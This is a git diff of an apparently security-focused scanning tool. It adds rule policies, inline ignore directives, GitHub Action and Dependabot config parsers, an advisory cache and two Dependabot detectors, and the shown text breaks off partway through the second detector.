{ ...configRaw } : undefined; + + if (disable === undefined && ignore === undefined && config === undefined) { + return undefined; + } + + return { + disable, + ignore, + config, + }; +} + +function normalizeRulePolicyMap( + rules: Record | undefined, +): RulePolicyMap | undefined { + if (!rules || typeof rules !== "object") { + return undefined; + } + + const normalized: RulePolicyMap = {}; + + for (const [ruleId, value] of Object.entries(rules)) { + const key = ruleId.trim(); + if (key.length === 0) { + continue; + } + + const policy = normalizeRulePolicyConfig(value); + if (!policy) { + continue; + } + + normalized[key] = policy; + } + + return Object.keys(normalized).length > 0 ? normalized : undefined; +} + +function mergeRulePolicyConfig( + current: RulePolicyConfig | undefined, + incoming: RulePolicyConfig | undefined, +): RulePolicyConfig | undefined { + if (!current) { + if (!incoming) { + return undefined; + } + return { + disable: incoming.disable, + ignore: incoming.ignore ? [...incoming.ignore] : undefined, + config: incoming.config ? { ...incoming.config } : undefined, + }; + } + + if (!incoming) { + return { + disable: current.disable, + ignore: current.ignore ? [...current.ignore] : undefined, + config: current.config ? { ...current.config } : undefined, + }; + } + + return { + disable: incoming.disable ?? current.disable, + ignore: unique([ + current.ignore as string[] | undefined, + incoming.ignore as string[] | undefined, + ]), + config: + current.config || incoming.config + ? { + ...(current.config ?? {}), + ...(incoming.config ?? {}), + } + : undefined, + }; +} + +function mergeRulePolicyMaps(...maps: Array): RulePolicyMap | undefined { + const merged: RulePolicyMap = {}; + + for (const map of maps) { + if (!map) { + continue; + } + for (const [ruleId, policy] of Object.entries(map)) { + merged[ruleId] = mergeRulePolicyConfig(merged[ruleId], policy) ?? merged[ruleId]; + } + } + + return Object.keys(merged).length > 0 ? 
merged : undefined; +} + +function normalizePersona(value: string | undefined): AuditPersona | undefined { + if (!value) { + return undefined; + } + return PERSONAS.find((persona) => persona === value) ?? undefined; +} + +function normalizeRuntimeMode(value: string | undefined): RuntimeMode | undefined { + if (!value) { + return undefined; + } + return RUNTIME_MODES.find((mode) => mode === value) ?? undefined; +} + function unique(values: Array): string[] { const merged = values.flatMap((entry) => entry ?? []); const seen = new Set(); @@ -353,6 +575,48 @@ export function resolveEffectiveConfig(options: ResolveConfigOptions): CodeGateC globalConfig.skip_rules, projectConfig.skip_rules, ]), + strict_collection: + pickFirst( + projectConfig.strict_collection, + globalConfig.strict_collection, + DEFAULT_CONFIG.strict_collection, + ) ?? DEFAULT_CONFIG.strict_collection, + scan_collection_modes: + pickFirst( + normalizeCollectionModes(projectConfig.scan_collection_modes), + normalizeCollectionModes(globalConfig.scan_collection_modes), + DEFAULT_CONFIG.scan_collection_modes, + ) ?? DEFAULT_CONFIG.scan_collection_modes, + scan_collection_kinds: + pickFirst( + normalizeCollectionKinds(projectConfig.scan_collection_kinds), + normalizeCollectionKinds(globalConfig.scan_collection_kinds), + ) ?? undefined, + rules: + mergeRulePolicyMaps( + normalizeRulePolicyMap(globalConfig.rules), + normalizeRulePolicyMap(projectConfig.rules), + ) ?? undefined, + persona: + pickFirst( + normalizePersona(projectConfig.persona), + normalizePersona(globalConfig.persona), + DEFAULT_CONFIG.persona, + ) ?? DEFAULT_CONFIG.persona, + runtime_mode: + pickFirst( + normalizeRuntimeMode(projectConfig.runtime_mode), + normalizeRuntimeMode(globalConfig.runtime_mode), + DEFAULT_CONFIG.runtime_mode, + ) ?? 
DEFAULT_CONFIG.runtime_mode, + workflow_audits: { + enabled: + pickFirst( + projectConfig.workflow_audits?.enabled, + globalConfig.workflow_audits?.enabled, + DEFAULT_CONFIG.workflow_audits?.enabled, + ) ?? false, + }, suppress_findings: unique([ DEFAULT_CONFIG.suppress_findings, globalConfig.suppress_findings, @@ -374,6 +638,7 @@ export function applyConfigPolicy(report: CodeGateReport, config: CodeGateConfig const findings = applySuppressionPolicy(report.findings, { suppress_findings: config.suppress_findings, suppression_rules: config.suppression_rules, + rule_policies: config.rules, }).map((finding) => ({ ...finding, owasp: config.owasp_mapping ? finding.owasp : [], diff --git a/src/config/inline-ignore.ts b/src/config/inline-ignore.ts new file mode 100644 index 0000000..51d26f3 --- /dev/null +++ b/src/config/inline-ignore.ts @@ -0,0 +1,83 @@ +import type { Finding } from "../types/finding.js"; + +export interface InlineIgnoreDirectiveSet { + rules: Set; + ruleLines: Map>; +} + +export type InlineIgnoreMap = Map; + +function normalizeRuleId(value: string): string | null { + const trimmed = value.trim(); + return trimmed.length > 0 ? trimmed : null; +} + +function addDirective(target: InlineIgnoreDirectiveSet, ruleId: string, line: number): void { + target.rules.add(ruleId); + + const lines = target.ruleLines.get(ruleId) ?? 
new Set(); + lines.add(line); + target.ruleLines.set(ruleId, lines); +} + +function parseDirectiveRules(raw: string): string[] { + return raw + .split(",") + .map((entry) => normalizeRuleId(entry)) + .filter((entry): entry is string => entry !== null); +} + +export function collectInlineIgnoreDirectives( + files: Array<{ filePath: string; textContent: string }>, +): InlineIgnoreMap { + const directives: InlineIgnoreMap = new Map(); + const pattern = /codegate:\s*ignore\[([^\]]+)\]/giu; + + for (const file of files) { + const lines = file.textContent.split(/\r?\n/u); + let directiveSet = directives.get(file.filePath); + + for (let index = 0; index < lines.length; index += 1) { + const line = lines[index] ?? ""; + pattern.lastIndex = 0; + + for (const match of line.matchAll(pattern)) { + const ruleIds = parseDirectiveRules(match[1] ?? ""); + if (ruleIds.length === 0) { + continue; + } + + if (!directiveSet) { + directiveSet = { + rules: new Set(), + ruleLines: new Map>(), + }; + directives.set(file.filePath, directiveSet); + } + + for (const ruleId of ruleIds) { + addDirective(directiveSet, ruleId, index + 1); + } + } + } + } + + return directives; +} + +export function applyInlineIgnoreDirectives( + findings: T[], + directives: InlineIgnoreMap, +): T[] { + return findings.map((finding) => { + const set = directives.get(finding.file_path); + if (!set || !set.rules.has(finding.rule_id)) { + return finding; + } + + return { + ...finding, + suppressed: true, + }; + }); +} diff --git a/src/config/suppression-policy.ts b/src/config/suppression-policy.ts index de9669a..a6bb40e 100644 --- a/src/config/suppression-policy.ts +++ b/src/config/suppression-policy.ts @@ -3,15 +3,25 @@ import type { Finding } from "../types/finding.js"; export interface SuppressionRule { rule_id?: string; file_path?: string; + location?: string; severity?: Finding["severity"]; category?: Finding["category"]; cwe?: string; fingerprint?: string; } +export interface RulePolicyConfig { + disable?: 
boolean; + ignore?: readonly string[]; + config?: Record; +} + +export type RulePolicyMap = Record; + export interface SuppressionPolicy { suppress_findings?: readonly string[]; suppression_rules?: readonly SuppressionRule[]; + rule_policies?: RulePolicyMap; } function normalizeString(value: string | undefined): string | undefined { @@ -63,6 +73,45 @@ function matchesGlob(value: string, glob: string): boolean { return globToRegExp(glob).test(value.replaceAll("\\", "/")); } +interface SuppressionLocation { + filePath: string; + line?: number; + column?: number; +} + +function parseSuppressionLocation(value: string): SuppressionLocation | null { + const trimmed = normalizeString(value); + if (!trimmed) { + return null; + } + + const pieces = trimmed.split(":"); + if (pieces.length === 0 || pieces.length > 3) { + return null; + } + + const [filePath, lineRaw, columnRaw] = pieces; + if (!filePath) { + return null; + } + + const line = lineRaw !== undefined ? Number.parseInt(lineRaw, 10) : undefined; + const column = columnRaw !== undefined ? Number.parseInt(columnRaw, 10) : undefined; + + if (lineRaw !== undefined && (!Number.isFinite(line) || (line ?? 0) < 1)) { + return null; + } + if (columnRaw !== undefined && (!Number.isFinite(column) || (column ?? 0) < 1)) { + return null; + } + + return { + filePath: filePath.replaceAll("\\", "/"), + line, + column, + }; +} + function matchesSuppressionRule(finding: Finding, rule: SuppressionRule): boolean { const ruleId = normalizeString(rule.rule_id); if (ruleId && finding.rule_id !== ruleId) { @@ -74,6 +123,26 @@ function matchesSuppressionRule(finding: Finding, rule: SuppressionRule): boolea return false; } + const location = parseSuppressionLocation(rule.location ?? 
""); + if (location) { + const normalizedFindingPath = finding.file_path.replaceAll("\\", "/"); + if (normalizedFindingPath !== location.filePath) { + return false; + } + if ( + typeof location.line === "number" && + (typeof finding.location.line !== "number" || finding.location.line !== location.line) + ) { + return false; + } + if ( + typeof location.column === "number" && + (typeof finding.location.column !== "number" || finding.location.column !== location.column) + ) { + return false; + } + } + const severity = rule.severity; if (severity && finding.severity !== severity) { return false; @@ -97,6 +166,34 @@ function matchesSuppressionRule(finding: Finding, rule: SuppressionRule): boolea return true; } +function matchesRulePolicyIgnore(finding: Finding, location: string): boolean { + const parsed = parseSuppressionLocation(location); + if (!parsed) { + return false; + } + + const normalizedFindingPath = finding.file_path.replaceAll("\\", "/"); + if (normalizedFindingPath !== parsed.filePath) { + return false; + } + + if ( + typeof parsed.line === "number" && + (typeof finding.location.line !== "number" || finding.location.line !== parsed.line) + ) { + return false; + } + + if ( + typeof parsed.column === "number" && + (typeof finding.location.column !== "number" || finding.location.column !== parsed.column) + ) { + return false; + } + + return true; +} + export function applySuppressionPolicy( findings: T[], policy: SuppressionPolicy, @@ -107,14 +204,19 @@ export function applySuppressionPolicy( .filter((findingId): findingId is string => findingId !== undefined), ); const rules = policy.suppression_rules ?? []; + const rulePolicies = policy.rule_policies ?? 
{}; return findings.map((finding) => { const ruleMatch = rules.some((rule) => matchesSuppressionRule(finding, rule)); const legacyMatch = legacySuppressions.has(finding.finding_id); + const rulePolicy = rulePolicies[finding.rule_id]; + const ruleDisabled = rulePolicy?.disable === true; + const ruleIgnoreMatch = + rulePolicy?.ignore?.some((location) => matchesRulePolicyIgnore(finding, location)) ?? false; return { ...finding, - suppressed: finding.suppressed || legacyMatch || ruleMatch, + suppressed: finding.suppressed || legacyMatch || ruleMatch || ruleDisabled || ruleIgnoreMatch, }; }); } diff --git a/src/layer2-static/action/parser.ts b/src/layer2-static/action/parser.ts new file mode 100644 index 0000000..f988c4a --- /dev/null +++ b/src/layer2-static/action/parser.ts @@ -0,0 +1,213 @@ +import type { + ActionFacts, + ActionInputFacts, + ActionOutputFacts, + ActionRunsFacts, + ActionStepFacts, +} from "./types.js"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? value : undefined; +} + +function asBoolean(value: unknown): boolean | undefined { + return typeof value === "boolean" ? value : undefined; +} + +function asStringRecord(value: unknown): Record | undefined { + const record = asRecord(value); + if (!record) { + return undefined; + } + + const result: Record = {}; + for (const [key, entry] of Object.entries(record)) { + if (typeof entry === "string") { + result[key] = entry; + } + } + + return Object.keys(result).length > 0 ? result : undefined; +} + +function asStringArray(value: unknown): string[] | undefined { + if (!Array.isArray(value)) { + return undefined; + } + + const result = value.filter((entry): entry is string => typeof entry === "string"); + return result.length > 0 ? 
result : undefined; +} + +function normalizeActionPath(value: string): string { + return value.replaceAll("\\", "/"); +} + +export function isGitHubActionPath(path: string): boolean { + return /(?:^|\/)action\.ya?ml$/iu.test(normalizeActionPath(path)); +} + +function extractStepFacts(step: unknown): ActionStepFacts | null { + const stepRecord = asRecord(step); + if (!stepRecord) { + return null; + } + + const withEntries = asStringRecord(stepRecord.with); + const envEntries = asStringRecord(stepRecord.env); + const stepFacts: ActionStepFacts = { + id: asString(stepRecord.id), + name: asString(stepRecord.name), + uses: asString(stepRecord.uses), + run: asString(stepRecord.run), + if: asString(stepRecord.if), + shell: asString(stepRecord.shell), + workingDirectory: + asString(stepRecord["working-directory"]) ?? asString(stepRecord.workingDirectory), + with: withEntries, + env: envEntries, + }; + + if (!stepFacts.uses && !stepFacts.run) { + return null; + } + + return stepFacts; +} + +function extractInputs(value: unknown): Record | undefined { + const inputs = asRecord(value); + if (!inputs) { + return undefined; + } + + const result: Record = {}; + for (const [name, inputValue] of Object.entries(inputs)) { + const inputRecord = asRecord(inputValue); + if (!inputRecord) { + continue; + } + + const entry: ActionInputFacts = { + description: asString(inputRecord.description), + required: asBoolean(inputRecord.required), + default: asString(inputRecord.default), + deprecationMessage: + asString(inputRecord.deprecationMessage) ?? asString(inputRecord.deprecation_message), + }; + + if ( + entry.description !== undefined || + entry.required !== undefined || + entry.default !== undefined || + entry.deprecationMessage !== undefined + ) { + result[name] = entry; + } + } + + return Object.keys(result).length > 0 ? 
result : undefined; +} + +function extractOutputs(value: unknown): Record | undefined { + const outputs = asRecord(value); + if (!outputs) { + return undefined; + } + + const result: Record = {}; + for (const [name, outputValue] of Object.entries(outputs)) { + const outputRecord = asRecord(outputValue); + if (!outputRecord) { + continue; + } + + const entry: ActionOutputFacts = { + description: asString(outputRecord.description), + value: asString(outputRecord.value), + }; + + if (entry.description !== undefined || entry.value !== undefined) { + result[name] = entry; + } + } + + return Object.keys(result).length > 0 ? result : undefined; +} + +function extractRuns(value: unknown): ActionRunsFacts | undefined { + const runs = asRecord(value); + if (!runs) { + return undefined; + } + + const stepsRaw = Array.isArray(runs.steps) ? runs.steps : []; + const steps = stepsRaw + .map((step) => extractStepFacts(step)) + .filter((step): step is ActionStepFacts => step !== null); + + const result: ActionRunsFacts = { + using: asString(runs.using), + main: asString(runs.main), + pre: asString(runs.pre), + post: asString(runs.post), + image: asString(runs.image), + args: asStringArray(runs.args), + steps: steps.length > 0 ? steps : undefined, + }; + + if ( + result.using === undefined && + result.main === undefined && + result.pre === undefined && + result.post === undefined && + result.image === undefined && + result.args === undefined && + result.steps === undefined + ) { + return undefined; + } + + return result; +} + +export function extractActionFacts(parsed: unknown): ActionFacts | null { + const root = asRecord(parsed); + if (!root) { + return null; + } + + const runs = extractRuns(root.runs); + const inputs = extractInputs(root.inputs); + const outputs = extractOutputs(root.outputs); + const branding = asRecord(root.branding) ?? 
undefined; + + if ( + runs === undefined && + inputs === undefined && + outputs === undefined && + branding === undefined && + asString(root.name) === undefined && + asString(root.description) === undefined && + asString(root.author) === undefined + ) { + return null; + } + + return { + name: asString(root.name), + description: asString(root.description), + author: asString(root.author), + branding, + inputs, + outputs, + runs, + }; +} diff --git a/src/layer2-static/action/types.ts b/src/layer2-static/action/types.ts new file mode 100644 index 0000000..774f033 --- /dev/null +++ b/src/layer2-static/action/types.ts @@ -0,0 +1,43 @@ +export interface ActionStepFacts { + id?: string; + name?: string; + uses?: string; + run?: string; + if?: string; + shell?: string; + workingDirectory?: string; + with?: Record; + env?: Record; +} + +export interface ActionRunsFacts { + using?: string; + main?: string; + pre?: string; + post?: string; + image?: string; + args?: string[]; + steps?: ActionStepFacts[]; +} + +export interface ActionInputFacts { + description?: string; + required?: boolean; + default?: string; + deprecationMessage?: string; +} + +export interface ActionOutputFacts { + description?: string; + value?: string; +} + +export interface ActionFacts { + name?: string; + description?: string; + author?: string; + branding?: Record; + inputs?: Record; + outputs?: Record; + runs?: ActionRunsFacts; +} diff --git a/src/layer2-static/advisories/cache.ts b/src/layer2-static/advisories/cache.ts new file mode 100644 index 0000000..a171a3a --- /dev/null +++ b/src/layer2-static/advisories/cache.ts @@ -0,0 +1,62 @@ +import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; + +export interface AdvisoryPayload { + generatedAt: number; + advisories: Record; +} + +const CACHE_FILE = "gha-advisories.json"; + +function isRecord(value: unknown): value is Record { + return typeof value === "object" && value !== null && 
!Array.isArray(value); +} + +function isAdvisoryPayload(value: unknown): value is AdvisoryPayload { + if (!isRecord(value)) { + return false; + } + if (typeof value.generatedAt !== "number") { + return false; + } + if (!isRecord(value.advisories)) { + return false; + } + + return Object.values(value.advisories).every( + (entry) => Array.isArray(entry) && entry.every((item) => typeof item === "string"), + ); +} + +function cachePath(cacheDir: string): string { + return join(cacheDir, CACHE_FILE); +} + +export function loadCachedAdvisoryPayload( + cacheDir: string, + maxAgeMs: number, + now = Date.now(), +): AdvisoryPayload | null { + const path = cachePath(cacheDir); + if (!existsSync(path)) { + return null; + } + + try { + const parsed = JSON.parse(readFileSync(path, "utf8")) as unknown; + if (!isAdvisoryPayload(parsed)) { + return null; + } + if (now - parsed.generatedAt > maxAgeMs) { + return null; + } + return parsed; + } catch { + return null; + } +} + +export function saveCachedAdvisoryPayload(cacheDir: string, payload: AdvisoryPayload): void { + mkdirSync(cacheDir, { recursive: true }); + writeFileSync(cachePath(cacheDir), JSON.stringify(payload, null, 2), "utf8"); +} diff --git a/src/layer2-static/advisories/gha-advisory-client.ts b/src/layer2-static/advisories/gha-advisory-client.ts new file mode 100644 index 0000000..c3d9361 --- /dev/null +++ b/src/layer2-static/advisories/gha-advisory-client.ts @@ -0,0 +1,13 @@ +import type { RuntimeMode } from "../../config.js"; +import { loadBundledGithubAdvisories, type GithubMetadataClientOptions } from "../github/client.js"; +import type { AdvisoryPayload } from "../github/cache.js"; + +export interface LoadKnownVulnerableActionsOptions extends GithubMetadataClientOptions { + runtimeMode?: RuntimeMode; +} + +export function loadKnownVulnerableActions( + options: LoadKnownVulnerableActionsOptions = {}, +): AdvisoryPayload { + return loadBundledGithubAdvisories(options); +} diff --git 
a/src/layer2-static/advisories/gha-known-vulnerable-actions.json b/src/layer2-static/advisories/gha-known-vulnerable-actions.json new file mode 100644 index 0000000..2498a45 --- /dev/null +++ b/src/layer2-static/advisories/gha-known-vulnerable-actions.json @@ -0,0 +1,4 @@ +{ + "actions/checkout": ["v3"], + "tj-actions/changed-files": ["v39"] +} diff --git a/src/layer2-static/audits/registry.ts b/src/layer2-static/audits/registry.ts new file mode 100644 index 0000000..c2e8479 --- /dev/null +++ b/src/layer2-static/audits/registry.ts @@ -0,0 +1,53 @@ +import type { AuditPersona } from "../../config.js"; +import type { AuditSelectionContext, RegisteredAudit } from "./types.js"; + +const PERSONA_ORDER: Record = { + regular: 0, + pedantic: 1, + auditor: 2, +}; + +interface AuditSelectionContextWithDisable extends AuditSelectionContext { + disabledAuditIds?: readonly string[]; +} + +function resolvePersona(input: AuditSelectionContext): AuditPersona { + return input.persona ?? "regular"; +} + +function isPersonaAllowed(required: AuditPersona | undefined, current: AuditPersona): boolean { + const requiredPersona = required ?? "regular"; + return PERSONA_ORDER[current] >= PERSONA_ORDER[requiredPersona]; +} + +function isRuntimeAllowed( + onlineRequired: boolean | undefined, + context: AuditSelectionContext, +): boolean { + if (!onlineRequired) { + return true; + } + + const mode = context.runtimeMode ?? "offline"; + return mode === "online"; +} + +function isAuditDisabled(auditId: string, context: AuditSelectionContext): boolean { + const disabledAuditIds = (context as AuditSelectionContextWithDisable).disabledAuditIds; + return (disabledAuditIds ?? 
[]).includes(auditId); +} + +export function filterRegisteredAudits( + audits: Array>, + context: AuditSelectionContext, +): Array> { + const persona = resolvePersona(context); + return audits.filter( + (audit) => + !isAuditDisabled(audit.id, context) && + isPersonaAllowed(audit.minPersona, persona) && + isRuntimeAllowed(audit.onlineRequired, context), + ); +} + +export type { RegisteredAudit } from "./types.js"; diff --git a/src/layer2-static/audits/types.ts b/src/layer2-static/audits/types.ts new file mode 100644 index 0000000..f4aa96c --- /dev/null +++ b/src/layer2-static/audits/types.ts @@ -0,0 +1,14 @@ +import type { AuditPersona, RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; + +export interface AuditSelectionContext { + persona?: AuditPersona; + runtimeMode?: RuntimeMode; +} + +export interface RegisteredAudit { + id: string; + run: (context: TContext) => Finding[] | Promise; + minPersona?: AuditPersona; + onlineRequired?: boolean; +} diff --git a/src/layer2-static/dependabot/parser.ts b/src/layer2-static/dependabot/parser.ts new file mode 100644 index 0000000..e791749 --- /dev/null +++ b/src/layer2-static/dependabot/parser.ts @@ -0,0 +1,242 @@ +import type { + DependabotCommitMessageFacts, + DependabotCooldownFacts, + DependabotFacts, + DependabotGroupFacts, + DependabotRuleFacts, + DependabotScheduleFacts, + DependabotUpdateFacts, +} from "./types.js"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? value : undefined; +} + +function asNumber(value: unknown): number | undefined { + return typeof value === "number" && Number.isFinite(value) ? value : undefined; +} + +function asBoolean(value: unknown): boolean | undefined { + return typeof value === "boolean" ? 
value : undefined; +} + +function asStringArray(value: unknown): string[] | undefined { + if (!Array.isArray(value)) { + return undefined; + } + + const result = value.filter((entry): entry is string => typeof entry === "string"); + return result.length > 0 ? result : undefined; +} + +function normalizeDependabotPath(value: string): string { + return value.replaceAll("\\", "/"); +} + +export function isGitHubDependabotPath(path: string): boolean { + return /(?:^|\/)\.github\/dependabot\.ya?ml$/iu.test(normalizeDependabotPath(path)); +} + +function extractSchedule(value: unknown): DependabotScheduleFacts | undefined { + const schedule = asRecord(value); + if (!schedule) { + return undefined; + } + + const result: DependabotScheduleFacts = { + interval: asString(schedule.interval), + day: asString(schedule.day), + time: asString(schedule.time), + timezone: asString(schedule.timezone), + }; + + return result.interval || result.day || result.time || result.timezone ? result : undefined; +} + +function extractCooldown(value: unknown): DependabotCooldownFacts | undefined { + const cooldown = asRecord(value); + if (!cooldown) { + return undefined; + } + + const result: DependabotCooldownFacts = { + defaultDays: asNumber(cooldown["default-days"]), + semverMajorDays: asNumber(cooldown["semver-major-days"]), + semverMinorDays: asNumber(cooldown["semver-minor-days"]), + semverPatchDays: asNumber(cooldown["semver-patch-days"]), + }; + + return result.defaultDays !== undefined || + result.semverMajorDays !== undefined || + result.semverMinorDays !== undefined || + result.semverPatchDays !== undefined + ? result + : undefined; +} + +function extractCommitMessage(value: unknown): DependabotCommitMessageFacts | undefined { + const commitMessage = asRecord(value); + if (!commitMessage) { + return undefined; + } + + const result: DependabotCommitMessageFacts = { + prefix: asString(commitMessage.prefix), + prefixDevelopment: + asString(commitMessage["prefix-development"]) ?? 
asString(commitMessage.prefixDevelopment), + include: asString(commitMessage.include), + }; + + return result.prefix || result.prefixDevelopment || result.include ? result : undefined; +} + +function extractRuleFacts(value: unknown): DependabotRuleFacts | null { + const rule = asRecord(value); + if (!rule) { + return null; + } + + const result: DependabotRuleFacts = { + dependencyName: asString(rule["dependency-name"]) ?? asString(rule.dependencyName), + dependencyType: asString(rule["dependency-type"]) ?? asString(rule.dependencyType), + versions: asStringArray(rule.versions), + updateTypes: asStringArray(rule["update-types"]) ?? asStringArray(rule.updateTypes), + patterns: asStringArray(rule.patterns), + }; + + if ( + result.dependencyName !== undefined || + result.dependencyType !== undefined || + result.versions !== undefined || + result.updateTypes !== undefined || + result.patterns !== undefined + ) { + return result; + } + + return null; +} + +function extractGroupFacts(value: unknown): DependabotGroupFacts | null { + const group = asRecord(value); + if (!group) { + return null; + } + + const result: DependabotGroupFacts = { + dependencyType: asString(group["dependency-type"]) ?? asString(group.dependencyType), + updateTypes: asStringArray(group["update-types"]) ?? asStringArray(group.updateTypes), + patterns: asStringArray(group.patterns), + }; + + if ( + result.dependencyType !== undefined || + result.updateTypes !== undefined || + result.patterns !== undefined + ) { + return result; + } + + return null; +} + +function extractUpdateFacts(value: unknown): DependabotUpdateFacts | null { + const update = asRecord(value); + if (!update) { + return null; + } + + const allow = Array.isArray(update.allow) + ? update.allow + .map((entry) => extractRuleFacts(entry)) + .filter((entry): entry is DependabotRuleFacts => entry !== null) + : undefined; + const ignore = Array.isArray(update.ignore) + ? 
update.ignore + .map((entry) => extractRuleFacts(entry)) + .filter((entry): entry is DependabotRuleFacts => entry !== null) + : undefined; + + const groupsRecord = asRecord(update.groups); + const groups: Record = {}; + if (groupsRecord) { + for (const [name, groupValue] of Object.entries(groupsRecord)) { + const groupFacts = extractGroupFacts(groupValue); + if (groupFacts) { + groups[name] = groupFacts; + } + } + } + + const result: DependabotUpdateFacts = { + packageEcosystem: asString(update["package-ecosystem"]) ?? asString(update.packageEcosystem), + directory: asString(update.directory), + targetBranch: asString(update["target-branch"]) ?? asString(update.targetBranch), + openPullRequestsLimit: + asNumber(update["open-pull-requests-limit"]) ?? asNumber(update.openPullRequestsLimit), + insecureExternalCodeExecution: + asBoolean(update["insecure-external-code-execution"]) ?? + asBoolean(update.insecureExternalCodeExecution), + schedule: extractSchedule(update.schedule), + cooldown: extractCooldown(update.cooldown), + labels: asStringArray(update.labels), + assignees: asStringArray(update.assignees), + reviewers: asStringArray(update.reviewers), + registries: asStringArray(update.registries), + commitMessage: extractCommitMessage(update["commit-message"] ?? update.commitMessage), + allow, + ignore, + groups: Object.keys(groups).length > 0 ? 
groups : undefined, + }; + + if ( + result.packageEcosystem !== undefined || + result.directory !== undefined || + result.targetBranch !== undefined || + result.openPullRequestsLimit !== undefined || + result.insecureExternalCodeExecution !== undefined || + result.schedule !== undefined || + result.cooldown !== undefined || + result.labels !== undefined || + result.assignees !== undefined || + result.reviewers !== undefined || + result.registries !== undefined || + result.commitMessage !== undefined || + result.allow !== undefined || + result.ignore !== undefined || + result.groups !== undefined + ) { + return result; + } + + return null; +} + +export function extractDependabotFacts(parsed: unknown): DependabotFacts | null { + const root = asRecord(parsed); + if (!root) { + return null; + } + + const version = asNumber(root.version); + const updatesRaw = Array.isArray(root.updates) ? root.updates : []; + const updates = updatesRaw + .map((entry) => extractUpdateFacts(entry)) + .filter((entry): entry is DependabotUpdateFacts => entry !== null); + + if (version === undefined && updates.length === 0) { + return null; + } + + return { + version, + updates, + }; +} diff --git a/src/layer2-static/dependabot/types.ts b/src/layer2-static/dependabot/types.ts new file mode 100644 index 0000000..7eb4523 --- /dev/null +++ b/src/layer2-static/dependabot/types.ts @@ -0,0 +1,56 @@ +export interface DependabotScheduleFacts { + interval?: string; + day?: string; + time?: string; + timezone?: string; +} + +export interface DependabotCooldownFacts { + defaultDays?: number; + semverMajorDays?: number; + semverMinorDays?: number; + semverPatchDays?: number; +} + +export interface DependabotCommitMessageFacts { + prefix?: string; + prefixDevelopment?: string; + include?: string; +} + +export interface DependabotRuleFacts { + dependencyName?: string; + dependencyType?: string; + versions?: string[]; + updateTypes?: string[]; + patterns?: string[]; +} + +export interface 
DependabotGroupFacts { + dependencyType?: string; + updateTypes?: string[]; + patterns?: string[]; +} + +export interface DependabotUpdateFacts { + packageEcosystem?: string; + directory?: string; + targetBranch?: string; + openPullRequestsLimit?: number; + insecureExternalCodeExecution?: boolean; + schedule?: DependabotScheduleFacts; + cooldown?: DependabotCooldownFacts; + labels?: string[]; + assignees?: string[]; + reviewers?: string[]; + registries?: string[]; + commitMessage?: DependabotCommitMessageFacts; + allow?: DependabotRuleFacts[]; + ignore?: DependabotRuleFacts[]; + groups?: Record; +} + +export interface DependabotFacts { + version?: number; + updates: DependabotUpdateFacts[]; +} diff --git a/src/layer2-static/detectors/dependabot-cooldown.ts b/src/layer2-static/detectors/dependabot-cooldown.ts new file mode 100644 index 0000000..e34b440 --- /dev/null +++ b/src/layer2-static/detectors/dependabot-cooldown.ts @@ -0,0 +1,80 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractDependabotFacts, isGitHubDependabotPath } from "../dependabot/parser.js"; + +export interface DependabotCooldownInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasCooldown(update: { + cooldown?: { + defaultDays?: number; + semverMajorDays?: number; + semverMinorDays?: number; + semverPatchDays?: number; + }; +}): boolean { + const cooldown = update.cooldown; + if (!cooldown) { + return false; + } + + return ( + typeof cooldown.defaultDays === "number" || + typeof cooldown.semverMajorDays === "number" || + typeof cooldown.semverMinorDays === "number" || + typeof cooldown.semverPatchDays === "number" + ); +} + +export function detectDependabotCooldown(input: DependabotCooldownInput): Finding[] { + if (!isGitHubDependabotPath(input.filePath)) { + return []; + } + + const facts = extractDependabotFacts(input.parsed); + if (!facts || facts.updates.length === 0) { + return 
[]; + } + + const findings: Finding[] = []; + + facts.updates.forEach((update, index) => { + if (!update.schedule || hasCooldown(update)) { + return; + } + + const ecosystem = update.packageEcosystem ?? "unknown-ecosystem"; + const directory = update.directory ?? "/"; + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ecosystem, directory, "schedule", "cooldown"], + fallbackValue: `${ecosystem} ${directory} update rule has no cooldown`, + }); + + findings.push({ + rule_id: "dependabot-cooldown", + finding_id: `DEPENDABOT_COOLDOWN-${input.filePath}-${index}`, + severity: "LOW", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `updates[${index}].cooldown` }, + description: + "Dependabot update rule has no cooldown window, increasing update churn and review pressure", + affected_tools: ["dependabot"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-400", + confidence: "MEDIUM", + fixable: false, + remediation_actions: ["Add cooldown settings to pace update volume and review load"], + evidence: evidence?.evidence ?? 
null, + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/dependabot-execution.ts b/src/layer2-static/detectors/dependabot-execution.ts new file mode 100644 index 0000000..a62bfda --- /dev/null +++ b/src/layer2-static/detectors/dependabot-execution.ts @@ -0,0 +1,86 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { isGitHubDependabotPath } from "../dependabot/parser.js"; + +export interface DependabotExecutionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isExternalCodeExecutionAllowed(value: unknown): boolean { + if (value === true) { + return true; + } + if (typeof value === "string") { + const normalized = value.trim().toLowerCase(); + return normalized === "allow" || normalized === "true"; + } + return false; +} + +export function detectDependabotExecution(input: DependabotExecutionInput): Finding[] { + if (!isGitHubDependabotPath(input.filePath)) { + return []; + } + + const root = asRecord(input.parsed); + const updates = Array.isArray(root?.updates) ? root.updates : []; + if (updates.length === 0) { + return []; + } + + const findings: Finding[] = []; + + updates.forEach((entry, index) => { + const update = asRecord(entry); + if (!update) { + return; + } + + if (!isExternalCodeExecutionAllowed(update["insecure-external-code-execution"])) { + return; + } + + const ecosystem = + typeof update["package-ecosystem"] === "string" + ? 
